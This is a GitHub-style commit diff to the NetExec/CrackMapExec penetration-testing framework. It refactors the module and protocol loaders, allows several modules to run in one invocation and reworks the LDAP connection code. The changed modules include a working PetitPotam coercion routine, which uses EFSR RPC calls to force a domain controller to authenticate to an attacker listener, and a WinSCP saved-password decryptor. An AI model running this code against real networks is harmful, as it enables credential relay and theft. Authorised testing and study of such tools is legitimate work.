swisskyrepo
/
NetExec
mirror of https://github.com/swisskyrepo/NetExec.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #19 from mpgn/modules_marshall 

Modules Update
main
mpgn 2023-03-30 12:28:09 +02:00 committed by GitHub
parent 1b315e1c69 388f4798c2
commit 1af5780416
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
14 changed files with 691 additions and 485 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
cme/cli.py
View File

@ -4,16 +4,17 @@
import argparse
import sys
from argparse import RawTextHelpFormatter
from cme.loaders.protocol_loader import protocol_loader
from cme.loaders.protocolloader import ProtocolLoader
from cme.helpers.logger import highlight
from termcolor import colored
def gen_cli_args():
VERSION = '5.4.6'
VERSION = '5.4.6'
CODENAME = "Bruce Wayne"
p_loader = protocol_loader()
p_loader = ProtocolLoader()
protocols = p_loader.get_protocols()
parser = argparse.ArgumentParser(description=f"""
@ -64,7 +65,7 @@ def gen_cli_args():
module_parser = argparse.ArgumentParser(add_help=False)
mgroup = module_parser.add_mutually_exclusive_group()
mgroup.add_argument("-M", "--module", metavar='MODULE', help='module to use')
mgroup.add_argument("-M", "--module", action='append', metavar='MODULE', help='module to use')
#mgroup.add_argument('-MC','--module-chain', metavar='CHAIN_COMMAND', help='Payload module chain command string to run')
module_parser.add_argument('-o', metavar='MODULE_OPTION', nargs='+', default=[], dest='module_options', help='module options')
module_parser.add_argument('-L', '--list-modules', action='store_true', help='list available modules')
@ -84,7 +85,6 @@ def gen_cli_args():
args = parser.parse_args()
if args.version:
print(VERSION + " - " + CODENAME)
sys.exit(1)

6
cme/cmedb.py
View File

@ -11,7 +11,7 @@ import requests
from sqlalchemy import create_engine
from terminaltables import AsciiTable
import configparser
from cme.loaders.protocol_loader import protocol_loader
from cme.loaders.protocolloader import ProtocolLoader
from cme.paths import CONFIG_PATH, WS_PATH, WORKSPACE_DIR
from requests import ConnectionError
from sqlalchemy.exc import SAWarning
@ -345,7 +345,7 @@ class CMEDBMenu(cmd.Cmd):
self.conn = None
self.p_loader = protocol_loader()
self.p_loader = ProtocolLoader()
self.protocols = self.p_loader.get_protocols()
self.workspace = self.config.get('CME', 'workspace')
@ -460,7 +460,7 @@ def initialize_db(logger):
logger.info('Creating default workspace')
os.mkdir(os.path.join(WS_PATH, 'default'))
p_loader = protocol_loader()
p_loader = ProtocolLoader()
protocols = p_loader.get_protocols()
for protocol in protocols.keys():
try:

41
cme/connection.py
View File

@ -127,28 +127,33 @@ class connection(object):
r = getattr(self, k)()
def call_modules(self):
module_logger = CMEAdapter(extra={
'module': self.module.name.upper(),
'host': self.host,
'port': self.args.port,
'hostname': self.hostname
})
for module in self.module:
logging.debug(f"Loading module {module}")
module_logger = CMEAdapter(extra={
'module': module.name.upper(),
'host': self.host,
'port': self.args.port,
'hostname': self.hostname
})
context = Context(self.db, module_logger, self.args)
context.localip = self.local_ip
context = Context(self.db, module_logger, self.args)
context.localip = self.local_ip
try:
if hasattr(module, 'on_request') or hasattr(module, 'has_response'):
self.server.connection = self
self.server.context.localip = self.local_ip
if hasattr(self.module, 'on_request') or hasattr(self.module, 'has_response'):
self.server.connection = self
self.server.context.localip = self.local_ip
if hasattr(module, 'on_login'):
module.on_login(context, self)
if hasattr(self.module, 'on_login'):
self.module.on_login(context, self)
if self.admin_privs and hasattr(module, 'on_admin_login'):
module.on_admin_login(context, self)
if self.admin_privs and hasattr(self.module, 'on_admin_login'):
self.module.on_admin_login(context, self)
if (not hasattr(self.module, 'on_request') and not hasattr(self.module, 'has_response')) and hasattr(self.module, 'on_shutdown'):
self.module.on_shutdown(context, self)
if (not hasattr(module, 'on_request') and not hasattr(module, 'has_response')) and hasattr(module,'on_shutdown'):
module.on_shutdown(context, self)
except Exception as e:
self.logger.error(f"Error while loading module {module}: {e}")
pass
def inc_failed_login(self, username):
global global_failed_logins

83
cme/crackmapexec.py
View File

@ -11,8 +11,8 @@ from cme.parsers.ip import parse_targets
from cme.parsers.nmap import parse_nmap_xml
from cme.parsers.nessus import parse_nessus_file
from cme.cli import gen_cli_args
from cme.loaders.protocol_loader import protocol_loader
from cme.loaders.module_loader import module_loader
from cme.loaders.protocolloader import ProtocolLoader
from cme.loaders.moduleloader import ModuleLoader
from cme.servers.http import CMEServer
from cme.first_run import first_run_setup
from cme.context import Context
@ -144,7 +144,7 @@ def main():
powershell.obfuscate_ps_scripts = True
logging.debug(f"Protocol: {args.protocol}")
p_loader = protocol_loader()
p_loader = ProtocolLoader()
protocol_path = p_loader.get_protocols()[args.protocol]['path']
logging.debug(f"Protocol Path: {protocol_path}")
protocol_db_path = p_loader.get_protocols()[args.protocol]['dbpath']
@ -165,56 +165,61 @@ def main():
setattr(protocol_object, 'config', config)
if hasattr(args, 'module'):
loader = module_loader(args, db, logger)
if args.list_modules:
modules = loader.get_modules()
loader = ModuleLoader(args, db, logger)
modules = loader.get_modules()
if args.list_modules:
for name, props in sorted(modules.items()):
logger.info('{:<25} {}'.format(name, props['description']))
sys.exit(0)
elif args.module and args.show_module_options:
modules = loader.get_modules()
for name, props in modules.items():
if args.module.lower() == name.lower():
logger.info('{} module options:\n{}'.format(name, props['options']))
for module in args.module:
logger.info(f"{module} module options:\n{modules[module]['options']}")
sys.exit(0)
elif args.module:
modules = loader.get_modules()
for name, props in modules.items():
if args.module.lower() == name.lower():
module = loader.init_module(props['path'])
setattr(protocol_object, 'module', module)
break
logging.debug(f"Modules to be Loaded: {args.module}, {type(args.module)}")
for m in map(str.lower, args.module):
if m not in modules:
logger.error(f"Module not found: {m}")
exit(1)
if not module:
logger.error('Module not found')
exit(1)
logging.debug(f"Loading module {m} at path {modules[m]['path']}")
module = loader.init_module(modules[m]['path'])
if getattr(module, 'opsec_safe') is False:
ans = input(highlight('[!] Module is not opsec safe, are you sure you want to run this? [Y/n] ', 'red'))
if ans.lower() not in ['y', 'yes', '']:
sys.exit(1)
if not module.opsec_safe:
ans = input(
highlight('[!] Module is not opsec safe, are you sure you want to run this? [Y/n] ', 'red'))
if ans.lower() not in ['y', 'yes', '']:
sys.exit(1)
if getattr(module, 'multiple_hosts') is False and len(targets) > 1:
ans = input(highlight("[!] Running this module on multiple hosts doesn't really make any sense, are you sure you want to continue? [Y/n] ", 'red'))
if ans.lower() not in ['y', 'yes', '']:
sys.exit(1)
if not module.multiple_hosts and len(targets) > 1:
ans = input(highlight("[!] Running this module on multiple hosts doesn't really make any sense, are you sure you want to continue? [Y/n] ", 'red'))
if ans.lower() not in ['y', 'yes', '']:
sys.exit(1)
if hasattr(module, 'on_request') or hasattr(module, 'has_response'):
if hasattr(module, 'on_request') or hasattr(module, 'has_response'):
if hasattr(module, 'required_server'):
args.server = module.required_server
if hasattr(module, 'required_server'):
args.server = getattr(module, 'required_server')
if not args.server_port:
args.server_port = server_port_dict[args.server]
if not args.server_port:
args.server_port = server_port_dict[args.server]
# loading a module server multiple times will obviously fail
try:
context = Context(db, logger, args)
module_server = CMEServer(module, context, logger, args.server_host, args.server_port, args.server)
module_server.start()
protocol_object.server = module_server.server
except Exception as e:
logging.debug(f"Error loading module server for {module}: {e}")
context = Context(db, logger, args)
module_server = CMEServer(module, context, logger, args.server_host, args.server_port, args.server)
module_server.start()
setattr(protocol_object, 'server', module_server.server)
logging.debug(f"proto_object: {protocol_object}, type: {type(protocol_object)}")
logging.debug(f"proto object dir: {dir(protocol_object)}")
# get currently set modules, otherwise default to empty list
current_modules = getattr(protocol_object, 'module', [])
current_modules.append(module)
setattr(protocol_object, 'module', current_modules)
logging.debug(f"proto object module after adding: {protocol_object.module}")
if hasattr(args, 'ntds') and args.ntds and not args.userntds:
ans = input(highlight('[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] ', 'red'))

33
cme/loaders/module_loader.py → cme/loaders/moduleloader.py
View File

@ -1,16 +1,15 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import imp
import types
from importlib.machinery import SourceFileLoader
import importlib
import logging
import os
import sys
import cme
from cme.context import Context
from cme.logger import CMEAdapter
class module_loader:
class ModuleLoader:
def __init__(self, args, db, logger):
self.args = args
self.db = db
@ -19,7 +18,6 @@ class module_loader:
def module_is_sane(self, module, module_path):
module_error = False
if not hasattr(module, 'name'):
self.logger.error('{} missing the name variable'.format(module_path))
module_error = True
@ -47,44 +45,44 @@ class module_loader:
if module_error:
return False
return True
def load_module(self, module_path):
try:
module = imp.load_source('payload_module', module_path).CMEModule()
spec = importlib.util.spec_from_file_location("CMEModule", module_path)
module = spec.loader.load_module().CMEModule()
if self.module_is_sane(module, module_path):
return module
except Exception as e:
self.logger.error('Failed loading module at {}: {}'.format(module_path, e))
return None
def get_modules(self):
modules = {}
modules_paths = [os.path.join(os.path.dirname(cme.__file__), 'modules'), os.path.join(self.cme_path, 'modules')]
for path in modules_paths:
for module in os.listdir(path):
if module[-3:] == '.py' and module != 'example_module.py':
module_path = os.path.join(path, module)
m = self.load_module(os.path.join(path, module))
if m and (self.args.protocol in m.supported_protocols):
modules[m.name] = {'path': os.path.join(path, module), 'description': m.description, 'options': m.options.__doc__}#'chain_support': m.chain_support}
m = self.load_module(module_path)
if m and (self.args.protocol in m.supported_protocols):
modules[m.name.lower()] = {
'path': module_path,
'description': m.description,
'options': m.options.__doc__
} # 'chain_support': m.chain_support}
return modules
def init_module(self, module_path):
module = None
module = None
module = self.load_module(module_path)
if module:
module_logger = CMEAdapter(extra={'module': module.name.upper()})
context = Context(self.db, module_logger, self.args)
module_options = {}
for option in self.args.module_options:
@ -92,5 +90,4 @@ class module_loader:
module_options[str(key).upper()] = value
module.options(context, module_options)
return module

3
cme/loaders/protocol_loader.py → cme/loaders/protocolloader.py
View File

@ -6,7 +6,7 @@ import os
import cme
class protocol_loader:
class ProtocolLoader:
def __init__(self):
self.cme_path = os.path.expanduser('~/.cme')
@ -14,7 +14,6 @@ class protocol_loader:
loader = SourceFileLoader('protocol', protocol_path)
protocol = types.ModuleType(loader.name)
loader.exec_module(protocol)
#if self.module_is_sane(module, module_path):
return protocol
def get_protocols(self):

8
cme/modules/install_elevated.py
View File

@ -2,7 +2,7 @@
# -*- coding: utf-8 -*-
import logging
from impacket.dcerpc.v5.scmr import DCERPCSessionError
from impacket.dcerpc.v5 import scmr
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
@ -55,5 +55,7 @@ class CMEModule:
finally:
try:
remote_ops.finish()
except DCERPCSessionError as e:
logging.debug(f"Received error while attempting to clean up logins: {e}")
except scmr.DCERPCSessionError as e:
logging.debug(f"Received SessionError while attempting to clean up logins: {e}")
except Exception as e:
logging.debug(f"Received general exception while attempting to clean up logins: {e}")

64
cme/modules/ntlmv1.py
View File

@ -1,48 +1,54 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
from impacket.dcerpc.v5.rrp import DCERPCSessionError
class CMEModule:
'''
Detect if the targets's LmCompatibilityLevel will allow NTLMv1 authentication
"""
Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication
Module by @Tw1sm
'''
name = 'ntlmv1'
description = 'Detect if lmcompatibilitylevel on the target is set to 0 or 1'
supported_protocols = ['smb']
opsec_safe= True
"""
name = "ntlmv1"
description = "Detect if lmcompatibilitylevel on the target is set to 0 or 1"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
self.output = 'NTLMv1 allowed on: {} - LmCompatibilityLevel = {}'
self.output = "NTLMv1 allowed on: {} - LmCompatibilityLevel = {}"
def on_admin_login(self, context, connection):
try:
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
remote_ops = RemoteOperations(connection.conn, False)
remote_ops.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
if remote_ops._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
reg_handle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remote_ops._RemoteOperations__rrp,
reg_handle,
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
)
key_handle = ans['phkResult']
rtype = None
data = None
try:
rtype, data = rrp.hBaseRegQueryValue(
remote_ops._RemoteOperations__rrp,
key_handle,
"lmcompatibilitylevel\x00"
)
except rrp.DCERPCSessionError as e:
logging.debug(f"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set")
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa')
keyHandle = ans['phkResult']
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'lmcompatibilitylevel\x00')
if int(data) in [0, 1, 2]:
if rtype and data and int(data) in [0, 1, 2]:
context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data))
try:
remoteOps.finish()
except:
pass
except DCERPCSessionError as e:
try:
remoteOps.finish()
except:
pass
logging.debug(f"Error connecting to RemoteRegistry: {e}")
finally:
remote_ops.finish()

198
cme/modules/petitpotam.py
View File

@ -5,6 +5,8 @@
# Module by @mpgn_x64
import logging
import sys
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
@ -19,7 +21,7 @@ class CMEModule:
description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam"
supported_protocols = ['smb']
opsec_safe = True
multiple_hosts = False
multiple_hosts = True
def options(self, context, module_options):
'''
@ -28,15 +30,25 @@ class CMEModule:
'''
self.listener = "127.0.0.1"
if 'LISTENER' in module_options:
self.listener = module_options['LISTENER']
self.listener = module_options['LISTENER']
self.pipe = "lsarpc"
if 'PIPE' in module_options:
self.pipe = module_options['PIPE']
self.pipe = module_options['PIPE']
def on_login(self, context, connection):
plop = CoerceAuth()
dce = plop.connect(connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe=self.pipe, targetIp=connection.host, doKerberos=connection.kerberos, dcHost=connection.kdcHost)
if plop.EfsRpcOpenFileRaw(dce, self.listener):
dce = coerce(
connection.username,
password=connection.password,
domain=connection.domain,
lmhash=connection.lmhash,
nthash=connection.nthash,
target=connection.host,
pipe=self.pipe,
do_kerberos=connection.kerberos,
dc_host=connection.kdcHost,
target_ip=connection.host
)
if efs_rpc_open_file_raw(dce, self.listener):
context.log.highlight("VULNERABLE")
context.log.highlight("Next step: https://github.com/topotam/PetitPotam")
try:
@ -109,6 +121,7 @@ class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
('Display', LPWSTR),
)
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
structure = (
('Lenght', DWORD),
@ -135,13 +148,6 @@ class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
align = 1
structure = (
@ -179,90 +185,90 @@ class EfsRpcEncryptFileSrvResponse(NDRCALL):
('ErrorCode', ULONG),
)
class CoerceAuth:
def connect(self, username, password, domain, lmhash, nthash, target, pipe, targetIp, doKerberos, dcHost):
binding_params = {
'lsarpc': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'efsr': {
'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
},
'samr': {
'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'lsass': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'netlogon': {
'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
}
rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
if targetIp:
rpctransport.setRemoteHost(targetIp)
def coerce(username, password, domain, lmhash, nthash, target, pipe, do_kerberos, dc_host, target_ip=None):
binding_params = {
'lsarpc': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'efsr': {
'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
},
'samr': {
'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'lsass': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'netlogon': {
'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
}
rpc_transport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
if hasattr(rpc_transport, 'set_credentials'):
rpc_transport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
dce = rpctransport.get_dce_rpc()
dce.set_auth_type(RPC_C_AUTHN_WINNT)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
if target_ip:
rpc_transport.setRemoteHost(target_ip)
if doKerberos:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce = rpc_transport.get_dce_rpc()
dce.set_auth_type(RPC_C_AUTHN_WINNT)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
logging.debug("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
try:
dce.connect()
except Exception as e:
logging.debug("Something went wrong, check error status => %s" % str(e))
sys.exit()
logging.debug("[+] Connected!")
logging.debug("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
try:
dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
except Exception as e:
logging.debug("Something went wrong, check error status => %s" % str(e))
sys.exit()
logging.debug("[+] Successfully bound!")
return dce
def EfsRpcOpenFileRaw(self, dce, listener):
logging.debug("[-] Sending EfsRpcOpenFileRaw!")
try:
request = EfsRpcOpenFileRaw()
request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
request['Flag'] = 0
#request.dump()
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
logging.debug('[+] Got expected ERROR_BAD_NETPATH exception!!')
logging.debug('[+] Attack worked!')
return True
if str(e).find('rpc_s_access_denied') >= 0:
logging.debug('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
logging.debug('[+] OK! Using unpatched function!')
logging.debug("[-] Sending EfsRpcEncryptFileSrv!")
try:
request = EfsRpcEncryptFileSrv()
request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
logging.debug('[+] Got expected ERROR_BAD_NETPATH exception!!')
logging.debug('[+] Attack worked!')
return True
else:
logging.debug("Something went wrong, check error status => %s" % str(e))
else:
logging.debug("Something went wrong, check error status => %s" % str(e))
if do_kerberos:
rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
logging.debug("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
try:
dce.connect()
except Exception as e:
logging.debug("Something went wrong, check error status => %s" % str(e))
sys.exit()
logging.debug("[+] Connected!")
logging.debug("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
try:
dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
except Exception as e:
logging.debug("Something went wrong, check error status => %s" % str(e))
sys.exit()
logging.debug("[+] Successfully bound!")
return dce
def efs_rpc_open_file_raw(dce, listener):
logging.debug("[-] Sending EfsRpcOpenFileRaw!")
try:
request = EfsRpcOpenFileRaw()
request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
request['Flag'] = 0
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
logging.debug('[+] Got expected ERROR_BAD_NETPATH exception!!')
logging.debug('[+] Attack worked!')
return True
if str(e).find('rpc_s_access_denied') >= 0:
logging.debug('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
logging.debug('[+] OK! Using unpatched function!')
logging.debug("[-] Sending EfsRpcEncryptFileSrv!")
try:
request = EfsRpcEncryptFileSrv()
request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
logging.debug('[+] Got expected ERROR_BAD_NETPATH exception!!')
logging.debug('[+] Attack worked!')
return True
else:
logging.debug("Something went wrong, check error status => %s" % str(e))
else:
logging.debug("Something went wrong, check error status => %s" % str(e))

3
cme/modules/winscp_dump.py
View File

@ -7,6 +7,7 @@
# - https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/parser/winscp.rb
import traceback
from typing import Tuple
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
@ -105,7 +106,7 @@ class CMEModule:
clearpass = clearpass[len(key):]
return clearpass
def dec_next_char(self, passBytes) -> tuple[int, bytes]:
def dec_next_char(self, passBytes) -> "Tuple[int, bytes]":
"""
Decrypts the first byte of the password and returns the decrypted byte and the remaining bytes.
Parameters

486
cme/protocols/ldap.py
View File

@ -35,20 +35,23 @@ from pywerview.cli.helpers import *
from re import sub, I
from zipfile import ZipFile
from OpenSSL.SSL import SysCallError
ldap_error_status = {
"1":"STATUS_NOT_SUPPORTED",
"533":"STATUS_ACCOUNT_DISABLED",
"701":"STATUS_ACCOUNT_EXPIRED",
"531":"STATUS_ACCOUNT_RESTRICTION",
"530":"STATUS_INVALID_LOGON_HOURS",
"532":"STATUS_PASSWORD_EXPIRED",
"773":"STATUS_PASSWORD_MUST_CHANGE",
"775":"USER_ACCOUNT_LOCKED",
"50":"LDAP_INSUFFICIENT_ACCESS",
"KDC_ERR_CLIENT_REVOKED":"KDC_ERR_CLIENT_REVOKED",
"KDC_ERR_PREAUTH_FAILED":"KDC_ERR_PREAUTH_FAILED"
"1": "STATUS_NOT_SUPPORTED",
"533": "STATUS_ACCOUNT_DISABLED",
"701": "STATUS_ACCOUNT_EXPIRED",
"531": "STATUS_ACCOUNT_RESTRICTION",
"530": "STATUS_INVALID_LOGON_HOURS",
"532": "STATUS_PASSWORD_EXPIRED",
"773": "STATUS_PASSWORD_MUST_CHANGE",
"775": "USER_ACCOUNT_LOCKED",
"50": "LDAP_INSUFFICIENT_ACCESS",
"KDC_ERR_CLIENT_REVOKED": "KDC_ERR_CLIENT_REVOKED",
"KDC_ERR_PREAUTH_FAILED": "KDC_ERR_PREAUTH_FAILED"
}
def resolve_collection_methods(methods):
"""
Convert methods (string) to list of validated methods to resolve
@ -177,29 +180,44 @@ class ldap(connection):
def proto_logger(self):
self.logger = CMEAdapter(extra={
'protocol': "SMB",
'host': self.host,
'port': "445",
'hostname': self.hostname
})
'protocol': "SMB",
'host': self.host,
'port': "445",
'hostname': self.hostname
})
def get_ldap_info(self, host):
try:
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
ldapConnection = ldap_impacket.LDAPConnection(proto + '://%s' % host)
ldap_url = f"{proto}://{host}"
logging.debug(f"Connecting to {ldap_url} - {self.baseDN} [0]")
try:
ldap_connection = ldap_impacket.LDAPConnection(ldap_url)
except SysCallError as e:
if proto == "ldaps":
logging.debug(f"LDAPs connection to {ldap_url} failed - {e}")
# https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-ldap-over-ssl-3rd-certification-authority
logging.debug(f"Even if the port is open, LDAPS may not be configured")
else:
logging.debug(f"LDAP connection to {ldap_url} failed: {e}")
return [None, None, None]
resp = ldapConnection.search(scope=ldapasn1_impacket.Scope('baseObject'), attributes=['defaultNamingContext', 'dnsHostName'], sizeLimit=0)
resp = ldap_connection.search(
scope=ldapasn1_impacket.Scope('baseObject'),
attributes=['defaultNamingContext', 'dnsHostName'],
sizeLimit=0
)
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
target = None
targetDomain = None
baseDN = None
target_domain = None
base_dn = None
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'defaultNamingContext':
baseDN = str(attribute['vals'][0])
targetDomain = sub(',DC=', '.', baseDN[baseDN.lower().find('dc='):], flags=I)[3:]
base_dn = str(attribute['vals'][0])
target_domain = sub(',DC=', '.', base_dn[base_dn.lower().find('dc='):], flags=I)[3:]
if str(attribute['type']) == 'dnsHostName':
target = str(attribute['vals'][0])
except Exception as e:
@ -208,12 +226,12 @@ class ldap(connection):
except OSError as e:
return [None, None, None]
return [target, targetDomain, baseDN]
return [target, target_domain, base_dn]
def get_os_arch(self):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
string_binding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(string_binding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.args.kerberos:
@ -221,30 +239,29 @@ class ldap(connection):
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
except (DCERPCException, e):
except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))
return 0
def get_ldap_username(self):
extendedRequest = ldapasn1_impacket.ExtendedRequest()
extendedRequest['requestName'] = '1.3.6.1.4.1.4203.1.11.3' # whoami
extended_request = ldapasn1_impacket.ExtendedRequest()
extended_request['requestName'] = '1.3.6.1.4.1.4203.1.11.3' # whoami
response = self.ldapConnection.sendReceive(extendedRequest)
response = self.ldapConnection.sendReceive(extended_request)
for message in response:
searchResult = message['protocolOp'].getComponent()
if searchResult['resultCode'] == ldapasn1_impacket.ResultCode('success'):
responseValue = searchResult['responseValue']
if responseValue.hasValue():
value = responseValue.asOctets().decode(responseValue.encoding)[2:]
search_result = message['protocolOp'].getComponent()
if search_result['resultCode'] == ldapasn1_impacket.ResultCode('success'):
response_value = search_result['responseValue']
if response_value.hasValue():
value = response_value.asOctets().decode(response_value.encoding)[2:]
return value.split('\\')[1]
return ''
@ -261,37 +278,33 @@ class ldap(connection):
try:
self.conn.login('', '')
except BrokenPipeError as e:
self.logger.error(f"Broken Pipe Error while attempting to login")
self.logger.error(f"Broken Pipe Error while attempting to login: {e}")
except Exception as e:
if "STATUS_NOT_SUPPORTED" in str(e):
self.no_ntlm = True
pass
if not self.no_ntlm:
self.domain = self.conn.getServerDNSDomainName()
self.hostname = self.conn.getServerName()
self.domain = self.conn.getServerDNSDomainName()
self.hostname = self.conn.getServerName()
self.server_os = self.conn.getServerOS()
self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']
self.os_arch = self.get_os_arch()
self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']
self.os_arch = self.get_os_arch()
if not self.domain:
self.domain = self.hostname
try:
'''plaintext_login
DC's seem to want us to logoff first, windows workstations sometimes reset the connection
(go home Windows, you're drunk)
'''
# DC's seem to want us to logoff first, windows workstations sometimes reset the connection
self.conn.logoff()
except:
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
#Re-connect since we logged off
# Re-connect since we logged off
self.create_conn_obj()
self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
self.output_filename = self.output_filename.replace(":", "-")
@ -301,21 +314,23 @@ class ldap(connection):
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
self.logger.info(u"Connecting to LDAP {}".format(self.hostname))
#self.logger.info(self.endpoint)
# self.logger.info(self.endpoint)
else:
self.logger.extra['protocol'] = "SMB" if not self.no_ntlm else "LDAP"
self.logger.extra['port'] = "445" if not self.no_ntlm else "389"
self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(self.server_os,
' x{}'.format(self.os_arch) if self.os_arch else '',
self.hostname,
self.domain,
self.signing,
self.smbv1))
self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(
self.server_os,
' x{}'.format(self.os_arch) if self.os_arch else '',
self.hostname,
self.domain,
self.signing,
self.smbv1)
)
